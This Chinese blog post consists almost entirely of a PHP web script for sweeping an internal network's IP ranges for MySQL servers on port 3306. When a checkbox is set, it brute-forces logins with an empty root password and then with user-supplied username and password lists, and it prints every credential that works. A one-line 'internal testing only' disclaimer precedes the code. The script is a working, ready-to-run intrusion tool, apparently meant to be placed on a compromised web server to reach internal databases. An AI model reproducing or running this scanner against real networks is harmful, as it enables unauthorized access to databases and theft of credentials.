内网扫mysql弱口令脚本(php)

<?php

echo "from 米的暗部@bbs.isilic.org 仅供内部测试,请勿用于非法用途。";

#Class B PHP port scanner by anthrax @ insight-labs.org

session_start();

set_time_limit(0);

ob_implicit_flush(True);

ob_end_flush();



function check_port($ip,$port,$timeout=0.1) {

$conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);

if ($conn) {

fclose($conn);

return true;

}

}

function crackpwd($addr,$port,$userlist,$passlist,$type){

switch($type){



case 'mysql':



if(@mysql_connect($addr.':'.$port, 'root', '')){

echo 'MySQL Username: root EMPTY PASSWORD<br/>';

}

foreach($userlist as $username){

foreach($passlist as $pass){

if(@mysql_connect($addr.':'.$port, $username, $pass)){

echo 'MySQL Username: '.$username.' pwd: '.$pass.'<br/>';

}

}

}

break;



}

}



function scanip($ip,$timeout){

$portarr=array(

'3306'=>'MySQL Server'

);

foreach($portarr as $port=>$name){

if(check_port($ip,$port,$timeout=0.1)==True){

echo 'Port: '.$port.' '.$name.' is open<br/>';

@ob_flush();

@flush();



if(isset($_SESSION['crack'])||$_SESSION['crack']==true){

switch($port){



case '3306':

$type='mysql';

break;



default:

$type=false;

}

if($type){

global $userarr,$passarr;

crackpwd($ip,$port,$userarr,$passarr,$type);



@ob_flush();

@flush();

}



}//if

}

}

}



if(!isset($_SESSION['startip'])){

$_SESSION['startip']='Start IP';

$_SESSION['endip']='End IP';

$_SESSION['username']='···';

$_SESSION['password']='····';

}



echo '<html>

<form action="" method="post">

<input type="text" name="startip" value="'.$_SESSION['startip'].'" />

<input type="text" name="endip" value="'.$_SESSION['endip'].'" />

Timeout<input type="text" name="timeout" value="0.1" /><br/>

Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP

<input type="checkbox" name="crack" value="Crack password"><br/>

<textarea rows="10" cols="30" name="username">'.$_SESSION['username'].'

</textarea>

<textarea rows="10" cols="30" name="password">'.$_SESSION['password'].'

</textarea><br/>

<button type="submit" name="submit">Scan</button>

</form>

</html>

';

if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){

if(isset($_POST['crack'])){

global $userarr,$passarr;

$_SESSION['crack']=true;

$userarr=array_unique(explode("\n",str_replace("\r", "", $_POST['username'])));

$passarr=array_unique (explode("\n",str_replace("\r", "", $_POST['password'])));

$_SESSION['username']=$_POST['username'];

$_SESSION['password']=$_POST['password'];

}

$startip=$_POST['startip'];

$endip=$_POST['endip'];

$timeout=$_POST['timeout'];

$siparr=explode('.',$startip);

$eiparr=explode('.',$endip);

$ciparr=$siparr;

if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){

exit('IP error: Wrong IP address or Trying to scan class A address');

}

$_SESSION['startip']=$startip;

$_SESSION['endip']=$endip;

if($startip==$endip){

echo 'Scanning IP '.$startip.'<br/>';

@ob_flush();

@flush();

scanip($startip,$timeout);

@ob_flush();

@flush();

exit();

}



if($eiparr[3]!=255){

$eiparr[3]+=1;

}

while($ciparr!=$eiparr){

$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];

echo '<br/>Scanning IP '.$ip.'<br/>';

@ob_flush();

@flush();

scanip($ip,$timeout);

$ciparr[3]+=1;



if($ciparr[3]>255){

$ciparr[2]+=1;

$ciparr[3]=0;

}

if($ciparr[2]>255){

$ciparr[1]+=1;

$ciparr[2]=0;

}

}

}else{

exit('Missing input');

}

?>

2014112760899125.jpg

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码